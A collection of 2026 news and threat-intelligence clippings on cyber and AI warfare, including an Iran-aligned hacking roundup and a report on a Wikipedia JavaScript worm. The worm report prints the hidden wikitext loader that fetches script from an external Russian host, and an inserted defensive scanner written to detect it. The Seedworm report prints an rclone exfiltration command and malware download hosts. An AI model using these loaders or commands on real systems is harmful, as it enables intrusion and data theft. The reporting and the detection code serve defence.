Until now, updating all those factors was slow and often subjective. Now AI can process complex interactions instantaneously, accounting for how each change ripples through military choreography.

Once a strike occurs, AI can speed assessments of battle damage, via image-processing software like tools helping with initial intelligence. While analysis is limited by the quality of imagery—which can depend on factors as basic as weather and whether a target is above ground—AI’s ability to merge varied inputs is changing the discipline. In a process known as sensor fusion, AI can digest visuals, radar, heat signatures and mass-spectroscopy to synthesize a list of possible conclusions. Fast analysis of where attacks succeeded or failed in turn helps refine lists of subsequent targets.

One thing AI can’t replace is human judgment. Many military officials involved in AI projects warn that the technology’s capabilities risk prompting an overreliance on information it provides—a trend linked with the phrase “The computer said to do this.”

Offloading decisions to AI “is a serious concern,” said Probasco at Georgetown, who held various posts in the Navy. She said that, as with other weapons systems, safeguards must be implemented to limit risks. “That infrastructure is underinvested in now,” she said.

wsj.com EN 2026 AI warfare Cyber-warfare US-Israel-Iran-War
‘It means missile defence on datacentres’: drone strikes raise doubts over Gulf as AI superpower | US-Israel war on Iran | The Guardian https://www.theguardian.com/world/2026/mar/07/it-means-missile-defence-on-data-centres-drone-strikes-raises-doubts-over-gulf-as-ai-superpower
09/03/2026 06:44:38

theguardian.com
Daniel Boffey, Chief reporter
Sat 7 Mar 2026 12.00 CET

Iran’s targeting of commercial datacentres in the UAE and Bahrain signals a new frontier in asymmetric warfare

It is believed to be a first: the deliberate targeting of a commercial datacentre by the armed forces of a country at war.

At 4.30am on Sunday morning, what is thought to have been an Iranian Shahed 136 drone struck an Amazon Web Services datacentre in the United Arab Emirates, setting off a devastating fire and forcing a shutdown of the power supply. Further damage was inflicted as attempts were made to suppress the flames with water.

Soon after, a second datacentre owned by the US tech company was hit. Then a third was said to be in trouble, this time in Bahrain, after an Iranian drone turned into a fireball on striking land nearby.

Iranian state TV has claimed that Iran’s Islamic Revolutionary Guard Corps launched the attack “to identify the role of these centres in supporting the enemy’s military and intelligence activities”.

The network built by Jeff Bezos’s company could withstand one of its regional centres being taken out of action but not a second.

The coordinated strike had an immediate impact.

Millions of people in Dubai and Abu Dhabi woke up on Monday unable to pay for a taxi, order a food delivery, or check their bank balance on their mobile apps.

Whether there was a military impact is unclear – but the strikes swiftly brought the war directly into the lives of 11 million people in the UAE, nine out of 10 of whom are foreign nationals. Amazon has advised its clients to secure their data away from the region.

Perhaps more significantly, the strikes on this ‘next generation’ war target are now raising questions about the prospects of the UAE building on its plans, and many billions of pounds worth of US and other foreign investment, to exploit what they hope will be the ‘new oil’: artificial intelligence (AI).

“The UAE really wants to be a major AI player,” said Chris McGuire, an AI and technology competition expert who served as a White House national security council official in Joe Biden’s administration. “Their government has very strong conviction about this technology, probably stronger than any other government in the world, and if there’s going to start to be security questions around that, then they’re going to have to resolve those very quickly, somehow.”

A datacentre is a facility designed to store, manage, and operate digital data.

The growing demand by businesses for artificial intelligence (AI) and cloud computing – where firms have a pay-as-you-go relationship with the providers of servers, storage and software – is driving the need for centres that have significantly more computational power.

It requires a ready and consistent supply of very cheap electricity.

The UAE, as it seeks to diversify away from fossil fuels, has been able to point out that it has this in spades, along with a huge sovereign wealth fund ready to invest and subsidise projects.

According to Turner & Townsend’s Global Data Centre Index, the global cost of datacentre construction increased in 2025 by 5.5% – but the UAE ranks 44th out of 52 in the league table of most expensive unit cost per watt.

The UAE’s geography also makes it a critical subsea cable landing point, providing access between Europe and Asia.

Then there are the geo-politics, with the US keen to keep the Gulf states away from Chinese technology.

A four-day tour by Donald Trump of Saudi Arabia, Qatar, and the UAE last May coincided with the announcement of the construction of a vast new AI campus – a partnership between the UAE and the US – for the purpose of training powerful AI models.

As part of the deal, the Trump administration eased restrictions on advanced chips sales to the Gulf. OpenAI has said the planned UAE campus could eventually serve half the world’s population.

McGuire said that this week’s events could be pivotal. “If we’re going to have large scale datacentres built out in the Middle East, we’re going to have to get pretty serious about how we protect them,” he said. “We think about how to protect it right now, and we’re saying, ‘Oh, it means you have guards and good cybersecurity’.

“If you’re actually going to double down the Middle East, maybe it means missile defence on datacentres.”

Sean Gorman, the chief executive of Zephr.xyz, a technology firm that is a contractor to the US air force, said that the Gulf states’ ambitions would have likely been in the thoughts of military planners in Tehran.

He said: “I believe the Iranians are building on tactics they’ve seen be effective in the Ukraine conflict. Asymmetric warfare that can target critical infrastructure creates pressure on adversaries by disrupting public safety and economic activity.

“UAE and Bahrain have both been positioning themselves as global AI hubs by investing heavily in datacentres and fibre infrastructure to connect them to the rest of the world.

“If they can disrupt that infrastructure, it puts their strategic position under risk while also disrupting operations that are important to the economy. In addition, there could be an adjacent impact of defence operations, but that would likely be more luck than the primary objective.”

Gorman said the UAE had a “long track record of managing regional instability without becoming party to it” but that there were a range of risks apart from that from the air.

He said: “The UAE also has one of the most diversified submarine-cable landing environments in the Middle East, but the diversity is geographically uneven.

“There are multiple landing stations and cable systems, but many of them concentrate on the east coast at Fujairah, which creates a partial geographic chokepoint.

“In addition, there is a specific risk from Iranian cyber operations targeting US-aligned digital infrastructure in the Gulf, which presents a more concrete near-term threat to datacentre and cloud operations than geography in the traditional sense.”

Gorman said the concern would be if Iran demonstrated any further capability to target Gulf digital infrastructure as part of its retaliation.

He said: “The UAE will need to show partners that its infrastructure is defensible. This is the question investors should be asking, not whether the broader AI ambition survives.”

Vili Lehdonvirta, professor of technology policy at Aalto university and senior fellow at the Oxford Internet Institute, University of Oxford, said there were significant costs to such defences but that the danger was real.

The former chair of the US National Security Commission on AI, Eric Schmidt, suggested last year that a country falling behind in an AI arms race could bomb their adversary’s datacentres.

Lehdonvirta said he suspected that no one actually believed that datacentres “would get bombed despite such scenarios being openly floated for some time”.

“If that’s the case then from now on we might perhaps see operators of prominent datacentres like AWS [Amazon Web Services] investing in air defence, similar to how shipping operators armed up against pirates,” he said.

Where might Iran fruitfully strike next?

“The Iranians will be well aware that the fibreoptic cables that connect these datacentres to the United States and to the rest of the world run through the strait of Hormuz,” Lehdonvirta said, “although they’ll be closely watched by the US and allied forces.”

theguardian.com EN 2026 Cyber-warfare US-Israel-Iran-War Amazon datacenters
Spyware suppliers exploit more zero-days than nation states https://www.computerweekly.com/news/366639774/Spyware-suppliers-exploit-more-zero-days-than-nation-states
08/03/2026 12:13:58

computerweekly.com
By Alex Scroxton, Security Editor
Published: 05 Mar 2026 15:00

Exploitation of zero-days by commercial surveillance and spyware developers outpaced exploitation by nation-state actors last year, according to a report.

Suppliers of commercial spyware have edged ahead of nation-state threat actors when it comes to the exploitation of zero-day vulnerabilities at scale, according to data released by the Google Threat Intelligence Group (GTIG).

In a report titled Look what you made us patch: 2025 zero-days in review, the GTIG team said that of 42 unique zero-days it tracked in 2025, it was able to firmly attribute first exploitation of 15 to commercial surveillance vendors (CSVs), compared with 12 that were first exploited by nation-states – seven by China, and nine by financially motivated cyber criminals.

The data additionally highlight three zero-days that were “likely” exploited by China, and one possibly at the intersection of cyber crime and nation-state activity.

The GTIG team, comprising researchers Casey Charrier, James Sadowski, Zander Work, Clement Lecigne, Benoît Stevens and Fred Plan, wrote that despite CSVs increasingly focusing on operational security to obscure their unethical activity, the growth in their activity reflected a trend dating back several years.

“Historically, traditional state-sponsored cyber espionage groups have been the most prolific attributed users of zero-day vulnerabilities,” they said. “[But] over the last few years, the increase of zero-day exploitation attributed to CSVs and their customers has demonstrated the growing ability of these vendors to provide zero-day access to a wider range of threat actors than ever before.

“GTIG has reported extensively on the capabilities CSVs provide their clients, as well as how many CSV customers use zero-day exploits in attacks which erode civil liberties and human rights,” they added.

“In late 2025, we reported on how Intellexa, a prolific procurer and user of zero-days, adapted its operations and tool suite and continues to deliver extremely capable spyware to high paying customers.”

China-nexus threat actors
Beyond CSVs, China-nexus threat actors were the most prolific exploiters of new zero-days, predominantly focusing on edge and networking devices that are hard to monitor, as they seek to gain long-term footholds in their targets’ operations.

GTIG said it was clear that China-nexus espionage actors have become increasingly adept at developing and sharing exploits among themselves, demonstrating their government is prepared to shower them with plentiful technical, and presumably financial, resources – compared with the other “Big Four” states of Iran, North Korea and Russia.

Russian cyber criminals, on the other hand, continue to make a killing and remain able to similarly invest in technical expertise, as evidenced last year by Cl0p’s extortion campaign targeting flaws in Oracle E-Business Suite, and the exploitation of a flaw in the WinRAR file archiver by a group with possible links to the long-standing and ever-present Evil Corp crew.

Overall zero-day volumes remain on par
All this said, more widely, GTIG observed a total of 90 zero-days under active exploitation during 2025, lower than 2023’s record high of 100, but generally in the 60 to 100 range that has become established since the Covid-19 pandemic.

Of these 90 flaws, 43 (48%) targeted enterprise technology, with zero-days increasingly affecting security and network edge devices, favoured by cyber criminals and nation-states alike.

CSVs, on the other hand, tended to prefer mobile and browser exploits, the overall volume of which is ebbing and flowing – well up on 2024, but about on par with 2023 – likely thanks to more focused actions from the likes of Google on Android and Apple on iOS, which have forced such threat actors to expand or adjust their techniques, leading to the peaks and troughs.

Broken out by supplier, GTIG found that the clear majority of zero-days understandably target Microsoft, which accounted for 25 in total. This was followed by Google, with 11; Apple, with eight; Cisco and Fortinet, tied on four; and Ivanti and VMware, with three. Six more suppliers had two zero-days each, and the remaining 20 were split across 20 suppliers.

Looking ahead into 2026, GTIG said that as supply-side actors continue their work to make zero-day exploitation tougher for the bad guys – particularly in the mobile space – adversaries will unfortunately continue to hone their skills as well, foreshadowing more expansive techniques and a growing diversity of targets.

The team said that enterprise exploitation in particular will widen thanks to the sheer breadth of applications and devices now in use, with only a single point of failure needed for threat actors to engineer a breach.

The AI factor
The team also expects artificial intelligence (AI) to accelerate the race between attackers and defenders, with AI increasingly used to automate and scale attacks by accelerating recon activity and, critically, exploit discovery and development.

This will put more pressure on defenders to detect and respond to zero-days, but at the same time, they will of course be able to take advantage of AI tools – like agents – in their own work.

GTIG also indicated an emerging paradigm for zero-day exploitation in 2026, heralded by the Brickstorm malware campaign, in which data theft “has the potential to enable long-term zero-day development”.

Rather than merely stealing sensitive client data, Brickstorm’s actors – known as Warp Panda – used it to target their intellectual property, such as source code and development documents, something they could use to work angles on new zero-days in their victims’ software.

computerweekly.com EN 2026 Spyware zero-days
Israel says it knocked out Iran’s cyber warfare headquarters https://www.politico.com/news/2026/03/04/israel-iran-cyber-headquarters-00813364
08/03/2026 12:05:26

politico.com
By Maggie Miller
03/04/2026 07:00 PM EST

But it’s unclear if the strike has fully taken out Iran’s ability to launch cyberattacks as the Middle East war expands.
The Israel Defense Forces on Wednesday said it bombed a compound in Tehran housing Iran’s cyber warfare headquarters — but it’s unclear whether the strike will significantly kneecap Iran’s cyberattack capabilities.

According to a statement from the IDF, its forces on Wednesday carried out a “wide-scale strike” targeting a collection of military sites on the eastern edge of Tehran that allegedly housed the headquarters of the Iranian Islamic Revolutionary Guards Corps. The IDF claims that the IRGC’s “cyber and electronic headquarters” and its “Intelligence Directorate” were among the military outposts hit in the strike.

It’s unclear to what extent these military sites were damaged or whether there were any casualties. Iran remains under an almost total internet blackout, which began on Feb. 28 when the first U.S. and Israeli strikes began, limiting the flow of information coming out of Iran.

Spokespeople for the IDF and for the Israeli Embassy in Washington did not respond to requests for comment. A spokesperson for the White House declined to comment on whether the U.S. was involved in the strikes and instead deferred to U.S. Central Command, which did not respond to a request for comment.

The IRGC has been linked to major cyber operations against the U.S. in recent years, including a hack and leak attack against the presidential campaign of Donald Trump in 2024.

Iran-linked hackers have been hitting back against the U.S., Israel and surrounding Gulf nations since the U.S.-led military operation on Saturday, which resulted in the assassination of Iranian Supreme Leader Ayatollah Ali Khamenei. According to findings from Israeli cyber firm Check Point Software, two types of surveillance cameras popular across Israel, Qatar, Bahrain and other Middle Eastern nations were compromised by Iranian-linked hackers, likely to monitor missile-related damage to those nations.

Researchers from cybersecurity company Palo Alto Networks’ Unit42 have also tracked dozens of pro-Iran hacktivist groups launching cyberattacks since Feb. 28, largely targeting critical infrastructure. These groups have claimed responsibility for compromises to Israeli payment systems and the temporary shutdown of Kuwaiti government websites.

One of these groups, Handala, has ties to the Iranian Ministry of Intelligence and Security, and claimed responsibility this week for attacks on an Israeli oil and gas energy company and the shutdown of some Jordanian gas stations.

It’s difficult to verify whether this group actually carried out these attacks. Jordan’s cybersecurity agency confirmed earlier this week that it had thwarted an Iranian cyberattack on wheat silo management systems in the country.

Despite the IDF’s strikes against the IRGC’s cyber command centers, cyberattacks linked to outside actors sympathetic to Iran may continue relatively unscathed.

Lt. Gen. Charles Moore, former deputy commander of U.S. Cyber Command, which handles offensive U.S. cyber operations against adversaries, said Wednesday that the IDF strikes will likely have “a significant impact on the regime’s ability to continue to execute these types of operations.” Still, Moore said, “that doesn’t mean proxy forces or others that are ideologically aligned with the regime can’t still attempt to conduct operations against us or Israel.”

The Iranian government has often relied on proxy groups outside the country, including those based in Russia, to carry out cyberattacks or disinformation campaigns on its behalf. This makes it harder to trace efforts back to the Iranian regime and more difficult for impacted countries to respond to these types of decentralized attacks.

“Cyber is now embedded in modern conflict, and operational impact does not require all operators to be physically located in Tehran,” said Alexander Leslie, senior advisor on government affairs at cybersecurity company Recorded Future.

politico.com EN 2026 Israel warfare headquarters US-Israel-Iran-War
Wikipedia hit by self-propagating JavaScript worm that vandalized pages https://www.bleepingcomputer.com/news/security/wikipedia-hit-by-self-propagating-javascript-worm-that-vandalized-pages/
08/03/2026 11:57:19

bleepingcomputer.com
March 5, 2026
By Lawrence Abrams

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis.
Update: Added Wikimedia Foundation's statement below and made a correction to denote it was only the Meta-Wiki that was vandalized.

The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began modifying user scripts and vandalizing Meta-Wiki pages.

Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages.

Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes.

The JavaScript worm
According to Wikimedia's Phabricator issue tracker, it appears the incident started after a malicious script hosted on Russian Wikipedia was executed, causing a global JavaScript script on Wikipedia to be modified with malicious code.

The malicious script was stored at User:Ololoshka562/test.js [Archive], first uploaded in March 2024 and allegedly associated with scripts used in previous attacks on wiki projects.

Based on edit histories reviewed by BleepingComputer, the script is believed to have been executed for the first time by a Wikimedia employee account earlier today while testing user-script functionality. It is not currently known whether the script was executed intentionally, accidentally loaded during testing, or triggered by a compromised account.

BleepingComputer's review of the archived test.js script shows it self-propagates by injecting malicious JavaScript loaders into both a logged-in user's common.js and Wikipedia's global MediaWiki:Common.js, which is used by everyone.

MediaWiki allows both global and user-specific JavaScript files, such as MediaWiki:Common.js and User:<username>/common.js, which are executed in editors’ browsers to customize the wiki interface.

After the initial test.js script was loaded in a logged-in editor's browser, it attempted to modify two scripts using that editor's session and privileges:

User-level persistence: it tried to overwrite User:<username>/common.js with a loader that would automatically load the test.js script whenever that user browses the wiki while logged in.
Site-wide persistence: If the user had the right privileges, it would also edit the global MediaWiki:Common.js script, so that it would run for every editor that uses the global script.

[Image: Code to inject a self-propagating JavaScript worm into the MediaWiki:Common.js script. Source: BleepingComputer]
If the global script was successfully modified, anyone loading it would automatically execute the loader, which would then repeat the same steps, including infecting their own common.js, as shown below.

[Image: A Wikimedia user's infected common.js script. Source: BleepingComputer]
The script also includes functionality to edit a random page by requesting one via the Special:Random wiki command, then editing the page to insert an image and the following hidden JavaScript loader.

[[File:Woodpecker10.jpg|5000px]]
<span style="display:none">
[[#%3Cscript%3E$.getScript('//basemetrika.ru/s/e41')%3C/script%3E]]
</span>
According to BleepingComputer's analysis, approximately 3,996 pages were modified, and around 85 users had their common.js files replaced during the security incident. It is unknown how many pages were deleted.
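A defender-side scanner for the indicators described above (a display:none span whose link target hides a URL-encoded script element, script loaders in a common.js page that fetch code from off-wiki hosts, and the oversized image), written as an added example that is not BleepingComputer's or Wikimedia's code. The trusted-host list, the 2000px image threshold and the placeholder host malicious-host.example (standing in for the real domain shown in the article's snippet) are assumptions.

```javascript
// Added example: scan wikitext and user/site JavaScript for the worm's
// indicators. TRUSTED_HOSTS and MAX_IMAGE_PX are assumptions, not Wikimedia policy.
const TRUSTED_HOSTS = ['wikipedia.org', 'wikimedia.org', 'mediawiki.org'];
const MAX_IMAGE_PX = 2000; // a 5000px image is a vandalism tell, not a layout choice

// Script-loading calls a MediaWiki user script would use to pull remote code.
const LOADER_RE = /(?:\$\.getScript|mw\.loader\.load|importScriptURI)\s*\(\s*['"]([^'"]+)['"]/g;

function hostOf(url) {
  // Accept absolute and protocol-relative ("//host/path") URLs.
  const m = /^(?:https?:)?\/\/([^/?#]+)/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

function isTrustedHost(host) {
  return TRUSTED_HOSTS.some(t => host === t || host.endsWith('.' + t));
}

// Scan a JavaScript page (User:<name>/common.js or MediaWiki:Common.js) and
// report every loader that fetches code from a host outside the wiki.
function scanScript(js) {
  const findings = [];
  for (const m of js.matchAll(LOADER_RE)) {
    const host = hostOf(m[1]);
    if (host && !isTrustedHost(host)) {
      findings.push({ kind: 'external-loader', host, url: m[1] });
    }
  }
  return findings;
}

// Scan article wikitext for the two edits the worm made to random pages:
// an oversized image and a display:none span whose link target, once
// URL-decoded, contains a <script> element.
function scanWikitext(wikitext) {
  const findings = [];
  for (const m of wikitext.matchAll(/\[\[File:[^\]]*?\|\s*(\d+)px/gi)) {
    if (Number(m[1]) >= MAX_IMAGE_PX) {
      findings.push({ kind: 'oversized-image', px: Number(m[1]) });
    }
  }
  const hidden = /<span[^>]*display\s*:\s*none[^>]*>([\s\S]*?)<\/span>/gi;
  for (const m of wikitext.matchAll(hidden)) {
    let decoded;
    try { decoded = decodeURIComponent(m[1]); } catch (e) { decoded = m[1]; }
    if (/<script\b/i.test(decoded)) {
      const hosts = [...decoded.matchAll(LOADER_RE)].map(x => hostOf(x[1])).filter(Boolean);
      findings.push({ kind: 'hidden-script', hosts });
    }
  }
  return findings;
}

// Constructed samples. The loader host is a placeholder standing in for the
// real domain shown in the article's snippet.
const SAMPLE_WIKITEXT = [
  'Some ordinary article text.',
  '[[File:Woodpecker10.jpg|5000px]]',
  '<span style="display:none">',
  "[[#%3Cscript%3E$.getScript('//malicious-host.example/s/e41')%3C/script%3E]]",
  '</span>',
].join('\n');

const SAMPLE_COMMON_JS = [
  "mw.loader.load('//en.wikipedia.org/w/index.php?title=User:Example/gadget.js&action=raw&ctype=text/javascript');",
  "$.getScript('//malicious-host.example/s/e41');",
].join('\n');

console.log(scanWikitext(SAMPLE_WIKITEXT));
console.log(scanScript(SAMPLE_COMMON_JS));
```

Run against a dump of recent revisions of JavaScript pages and of pages touched by the suspect account; any external-loader or hidden-script finding is a revision to revert and an account whose session to invalidate.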

[Image: Pages modified by JavaScript worm. Source: BleepingComputer]
As the worm spread, engineers temporarily restricted editing across projects while reverting the malicious changes and removing references to the injected scripts.

During the cleanup, Wikimedia Foundation staff members also rolled back the common.js for numerous users across the platform. These modified pages have now been "suppressed" and are no longer visible in the change histories.

At the time of writing, the injected code has been removed, and editing is once again possible.

However, Wikimedia has not yet published a detailed post-incident report explaining exactly how the dormant script was executed or how widely the worm propagated before it was contained.

Update 3/5/26 7:45 PM ET: The Wikimedia Foundation shared the following statement with BleepingComputer, stating that the code was active for only 23 minutes, during which it only changed and deleted content on Meta-Wiki, which has since been restored.

"Earlier today, Wikimedia Foundation staff were conducting a security review of user-authored code on Wikipedia. During that review, we activated dormant code that was then quickly identified to be malicious. As a preventative measure, we temporarily disabled editing on Wikipedia and other Wikimedia projects while we removed the malicious code and confirmed the website was safe for user activity. The security issue behind this disruption has now been resolved.

The code was active for a 23 minute period. During that time, it changed and deleted content on Meta-Wiki – which is now being restored – but it did not cause permanent damage. We have no evidence that Wikipedia was under attack, or that personal information was breached as part of this incident. We are developing additional security measures to minimize the risk of this kind of incident happening again. Updates continue to be made available via the Foundation's public incident log."

bleepingcomputer.com EN 2026 JavaScript Security-Incident Wikimedia Wikipedia Worm
FBI targeted with ‘suspicious’ activity on its networks | CyberScoop https://cyberscoop.com/fbi-targeted-with-suspicious-activity-on-its-networks/
08/03/2026 11:55:07

cyberscoop.com
Written by Tim Starks

The FBI found evidence that its networks had been targeted in a suspected cybersecurity incident, the bureau confirmed on Thursday, without sharing any further details.

“The FBI identified and addressed suspicious activities on FBI networks, and we have leveraged all technical capabilities to respond,” the agency said in a statement. “We have nothing additional to provide.”

CNN and CBS reported that the suspicious activity targeted a digital system the FBI uses to manage and conduct surveillance, including work related to foreign surveillance warrants, wiretaps and pen registers, which are used to trace phone and computer data like IP addresses and dialed phone numbers.

News broke in 2024 that the Chinese hacking group Salt Typhoon had exploited the U.S. wiretapping system under the Communications Assistance for Law Enforcement Act that law enforcement and intelligence agencies rely upon, but CNN reported that it wasn’t clear if there was a connection between the 2024 and recent suspected incidents.

It also wasn’t clear when the incident occurred, or who was responsible.

The FBI, like virtually every federal agency, is no stranger to being targeted or infiltrated by hackers.

In 2023, the FBI said it had isolated and contained a cyber intrusion in its New York Field Office. In 2021, hackers exploited a misconfigured FBI server to send hoax emails, although the bureau said its own systems weren’t affected.

Congress, former agents and others have raised concerns about the FBI’s cyber capabilities among budget cuts and the loss of personnel under the second Trump administration. Brett Leatherman, leader of the bureau’s cyber division, told CyberScoop recently that it has suffered no diminishment of its ability to respond to threats and incidents.


cyberscoop.com EN 2026 FBI US Malicious suspicious activity
Hacktivists claim to have hacked Homeland Security to release ICE contract data https://techcrunch.com/2026/03/02/hacktivists-claim-to-have-hacked-homeland-security-to-release-ice-contract-data/
08/03/2026 11:52:34

techcrunch.com
Lorenzo Franceschi-Bicchierai
8:11 AM PST · March 2, 2026

A group of hacktivists calling themselves “Department of Peace” claimed to have hacked the Department of Homeland Security (DHS), leaking allegedly stolen documents online.

On Sunday, the nonprofit transparency collective DDoSecrets published data relating to contracts between DHS, Immigration and Customs Enforcement (ICE), and more than 6,000 companies, including defense contractors Anduril, L3Harris, Raytheon, and surveillance enabler Palantir, as well as tech giants Microsoft and Oracle.

The hacktivist said the data comes from the Office of Industry Partnership, a unit within DHS that procures technology from the private sector.

DHS and ICE did not immediately respond to a request for comment.

Department of Peace explained their motives in a document alongside the hack, citing the recent killings of two peaceful protesters, U.S. citizens Alex Pretti and Renée Good, earlier this year in Minneapolis by federal agents.

“Why hack the DHS? I can think of a couple Pretti Good reasons! I’m releasing this because the DHS is killing us and people deserve to know which companies support them and what they’re working on,” the hackers wrote.

Since the beginning of the Trump administration, DHS and federal immigration agents with ICE have undertaken a campaign of mass deportations, arresting people with largely no criminal records, and detaining them in overcrowded facilities where critics say they are held in inhumane conditions. The mass deportation campaign has been aided by several tech companies, with Palantir at the forefront.

Security researcher Micah Lee organized the leaked data on a dedicated website, making the information easily searchable.

The site shows the name of the contractors, the amount of money they were awarded, as well as contact information, such as full names, email addresses, and phone numbers.

The largest contracts by total money awarded included $70 million for Cyber Apex Solutions, a company that claims on its barebones website to be “focused on filling the security gaps of critical infrastructure” in the U.S.; and $59 million for Science Applications International Corporation (SAIC), which provides AI services for government agencies. Underwriters Laboratories was awarded $29 million to provide testing, certification, and market intelligence to customers.

Cyber Apex Solution, SAIC, and Underwriters Laboratories did not immediately respond to a request for comment.

This story was updated to clarify that Palantir enables, not provides, surveillance for the government.

techcrunch.com EN 2026 hacked Hacktivists US ICE Department-of-Peace Homeland-Security
Seedworm: Iranian APT on Networks of U.S. Bank, Airport, Software Company https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us
08/03/2026 11:47:52

security.com
5 Mar 2026

This activity began in early February and has continued in recent days. What organizations should expect next from Iran-aligned groups and the steps they should take to guard against cyberattacks.

Activity associated with Iranian APT group Seedworm has been spotted on the networks of multiple U.S. companies. The activity began in February 2026 and has continued in recent days.
A U.S. bank, airport, non-profit and the Israeli operations of a U.S. software company were among the targets.
We round up details of recent Iranian cyber threat activity and what defenders need to look out for.

The Iranian APT group Seedworm (aka MuddyWater, Temp Zagros, Static Kitten) has been active on the networks of multiple U.S. companies since the beginning of February 2026, with activity continuing in recent days following U.S. and Israeli military strikes on Iran that have sparked conflict in the region.

A U.S. bank, software company and airport, and non-governmental organizations in both the U.S. and Canada, have experienced suspicious activity on their networks in recent days and weeks. The software company is a supplier to the defense and aerospace industries among others, and has a presence in Israel, with the company’s Israel operation seeming to be the target in this activity.

A previously unknown backdoor, which we have named Dindoor, was found on the networks of the Israeli outpost of this software company, with the same backdoor seen on the networks of a U.S. bank and the Canadian non-profit organization. This backdoor leverages Deno, the secure runtime for JavaScript and TypeScript, to execute. This backdoor was signed with a certificate issued to “Amy Cherne”.

There was also an attempt to exfiltrate data from the software company using Rclone to a Wasabi cloud storage bucket. It’s not clear if this was successful.

rclone copy CSIDL_DRIVE_FIXED\backups wasabi:[REMOVED]:/192.168.0.x

A different, Python backdoor called Fakeset was found on the networks of the U.S. airport and non-profit. It was signed by certificates issued to “Amy Cherne” and “Donald Gay”. The Donald Gay certificate has been used previously to sign malware linked to Seedworm. The backdoor was downloaded from two servers belonging to the Backblaze cloud storage company:

gitempire.s3.us-east-005.backblazeb2.com

elvenforest.s3.us-east-005.backblazeb2.com

The Donald Gay certificate was also used to sign a sample from the malware family we call Stagecomp and which downloads the Darkcomp backdoor. The Stagecomp and the Darkcomp malware have been linked to Seedworm by vendors including Google, Microsoft and Kaspersky. While this malware wasn’t seen on the targeted networks, the use of the same certificates suggests the same actor - namely Seedworm - was behind the activity on the networks of the U.S. companies.

While it’s not known if the operations of Seedworm are disrupted by the current conflict, already having a presence on U.S. and Israeli networks prior to the current hostilities beginning means the threat group is in a potentially dangerous position to launch attacks. While we have disrupted these breaches, other organizations could still be vulnerable to attack.

Seedworm is a long-standing Iranian threat group, which usually mounts classic espionage attacks for the purposes of spying and information gathering. Active since 2017, CISA has said that Seedworm is “a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).” Seedworm originally focused on victims in the Middle East but later broadened its scope to target telecommunications, defense, local government, and oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own custom malware as well as using dual-use and living off the land tools.

Context
On February 28, 2026, the U.S. and Israel launched a coordinated offensive military air operation targeting Iran, leading to the death of Iran’s Supreme Leader Ayatollah Ali Khamenei, who was apparently killed on March 1 when a U.S./Israeli airstrike hit his compound. Several other high-ranking Iranian officials, as well as multiple civilians, were also killed in strikes.

In retaliation, Iran launched drones and ballistic missiles at adversaries throughout the Gulf region, including targeting Israel and U.S. military and diplomatic outposts in multiple countries in the region.

Because of the heated tension in the region and ongoing attacks, it is likely Iran and its allies may also initiate cyber operations to further target their adversaries. Both Israel and Iran have a history of carrying out destructive cyberattacks, including against each other. While internet access in Iran may be disrupted by current military operations, there are cyber operatives working for the regime based in other countries.

The UK’s National Cyber Security Centre released an alert following this recent activity, stating that “Iranian state and Iran-linked cyber actors almost certainly currently maintain at least some capability to conduct cyber activity” and warning about the potential threat posed by “Iran-linked hacktivists”. Check Point also reported recently that the Handala threat group (see below) has been using the Starlink satellite network to stay online even before this most recent activity began, with the group reportedly leveraging the technology since mid-January, when a nationwide Internet shutdown was announced by Iran’s government.

Examining the cyber activity typically carried out by threat actors associated with Iran and its allies may help us predict the kinds of cyber operations we may see being executed as this conflict continues.

Iranian threat actors have become increasingly proficient in recent years. Not only has their tooling and malware improved, but they’ve also demonstrated strong social engineering capabilities, including spear-phishing campaigns and “honeytrap” operations used to build relationships with targets of interest to gain access to accounts or sensitive information.

One of the hallmarks of Iran’s operations in cyberspace is that it periodically mounts destructive attacks against organizations in countries it deems hostile, which at the moment would obviously include the U.S. and Israel. That creates a risk for organizations in those countries because these attacks are about sending a message rather than stealing information, which means that any organization in the country targeted could be in the firing line.

Other recent activity
Doxing Israeli officials and regional energy sector participants
Handala is an Iranian-aligned hacktivist group that is also known to operate in support of Palestine. They have been active since at least 2024. They are known for conducting attacks targeting Israeli organizations and entities perceived to support Israel by conducting phishing attacks, data theft, ransomware, extortion and destructive attacks, including the use of custom wipers. The group operates a leaks site where victim names are posted alongside stolen data and messages from the group. The group was also reportedly active on multiple underground cybercrime forums including BreachForums, Ramp and Exploit during its early days, but has since become more active on Telegram channels and X (formerly Twitter).

In December 2025, the group claimed to have compromised the mobile devices of former Israeli Prime Minister Naftali Bennett and Benjamin Netanyahu's Chief of Staff, Tzachi Braverman. The group leaked material they said they had stolen from the phones, including the contact information of prominent Israeli officials, journalists and business people, photos and videos. However, analysis by researchers disputed some of these claims, saying that the attacks appeared to be limited to Telegram accounts, and did not achieve complete phone access.

In February 2026, Handala claimed to have breached one of Israel's largest healthcare networks. Meanwhile, in March 2026, the group said it had breached Sharjah National Oil Corporation and Israel Opportunity Energy, exfiltrating more than 1.3TB of sensitive data, including confidential financial data, oil contracts and project details. The group has also made claims about breaching Saudi Arabian energy company Saudi Aramco in a post on its leaks site. However, the documents shared appeared to consist of older files that were already in circulation previously. This raises the possibility that the claim may have been exaggerated or partially fabricated, potentially representing an influence or psychological operation intended to generate attention, panic or reputation damage. The group has also posted messages claiming that Israeli Prime Minister Benjamin Netanyahu will be their next target.

Spearphishing academics and NGOs for intelligence collection
In an October 2025 campaign, Seedworm carried out a sophisticated spear-phishing attack that used a compromised mailbox to distribute a custom backdoor known as Phoenix to international organizations across the Middle East and North Africa (MENA), targeting more than 100 government entities as part of an espionage campaign.

The attackers leveraged a malicious Office attachment that has technical overlap with previously reported Seedworm attacks to deliver Phoenix. The command & control (C&C) server also reportedly hosted the PDQ remote access tool, which was used for remote access and persistence, as well as a custom browser credential stealer. It is believed the motive behind these attacks was intelligence collection, as well as persistent access, for the purposes of longer-term espionage and exfiltration.

